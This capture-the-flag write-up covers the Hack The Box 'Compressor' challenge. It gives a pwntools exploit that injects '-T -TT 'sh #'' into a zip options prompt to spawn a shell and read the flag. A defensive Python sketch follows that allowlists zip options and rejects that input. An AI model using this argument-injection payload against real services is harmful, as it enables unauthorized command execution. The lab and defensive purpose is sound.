HackTheBox Compressor Writeup
Explore the basics of cybersecurity in the Compressor Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
from pwn import *
import sys

def exploit(ip, port):
    p = remote(ip, int(port))
    # Component 1, action 1: supply a name and content (both "htb")
    p.sendlineafter(b'[*] Choose component: ', b'1')
    p.sendlineafter(b'[*] Choose action: ', b'1')
    p.sendlineafter(b'Insert name: ', b'htb')
    p.sendlineafter(b'Insert content: ', b'htb')
    # Action 3: the zip action, which prompts for archive name, file name and options
    p.sendlineafter(b'[*] Choose action: ', b'3')
    p.sendlineafter(b'Insert <name>.zip: ', b'htb')
    p.sendlineafter(b'Insert <name>: ', b'htb')
    # The options field reaches the zip command line unfiltered
    p.sendlineafter(b'Insert <options>: ', b'-T -TT \'sh #\'')
    # Read the flag through the resulting shell
    p.sendline(b"cat ~/flag.txt")
    p.interactive()

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    ip, port = sys.argv[1].split(':')
    exploit(ip, port)
Summary
The Compressor Challenge on Hack The Box showcases command injection vulnerabilities in Linux utilities. By exploiting the zip command with carefully crafted options (-T -TT), you can achieve arbitrary code execution. This challenge introduces beginners to leveraging insecure command execution techniques, referencing tools like GTFOBins for practical exploitation. With basic Linux terminal knowledge, you manipulate arguments to gain shell access and retrieve the flag, demonstrating real-world exploitation of misconfigured programs.
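The fix on the service side is to stop passing the options field through to zip untouched. The sketch below is an added example, not the challenge's own code: it builds the zip argument list from an allowlist and rejects the -T -TT input used above. The function names, the allowlist and the name policy are assumptions chosen for illustration.

```python
import re
import shlex

# Assumed policy: only zip flags that take no command or path argument.
ALLOWED_OPTIONS = {"-q", "-r", "-j"} | {f"-{n}" for n in range(10)}
# Plain file names only: no leading dash, no path separators, no "..".
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


class RejectedInput(ValueError):
    """Raised when user input is not covered by the policy above."""


def check_name(value, label):
    if not SAFE_NAME.fullmatch(value):
        raise RejectedInput(f"{label} {value!r} is not a plain file name")
    return value


def build_zip_argv(archive, member, options):
    """Return an argv list for subprocess.run(argv), never a shell string."""
    check_name(archive, "archive")
    check_name(member, "member")
    try:
        tokens = shlex.split(options)
    except ValueError as exc:  # e.g. unbalanced quotes
        raise RejectedInput(f"unparseable options: {exc}") from exc
    for token in tokens:
        if token not in ALLOWED_OPTIONS:
            raise RejectedInput(f"option {token!r} is not allowlisted")
    return ["zip", *tokens, f"{archive}.zip", member]


def audit(samples):
    """Classify each options string as 'allow' or 'reject'."""
    results = []
    for options in samples:
        try:
            build_zip_argv("htb", "htb", options)
            results.append((options, "allow"))
        except RejectedInput:
            results.append((options, "reject"))
    return results


# Constructed sample inputs; the third is the options string from the writeup.
CONSTRUCTED_SAMPLES = ["-q", "-r -9", "-T -TT 'sh #'", "-q 'unbalanced"]

if __name__ == "__main__":
    for options, verdict in audit(CONSTRUCTED_SAMPLES):
        print(f"{verdict:6} {options}")
```

Because -TT names the command zip runs when -T tests the archive, an allowlist is the safer design here: a denylist has to anticipate every option that can launch a program.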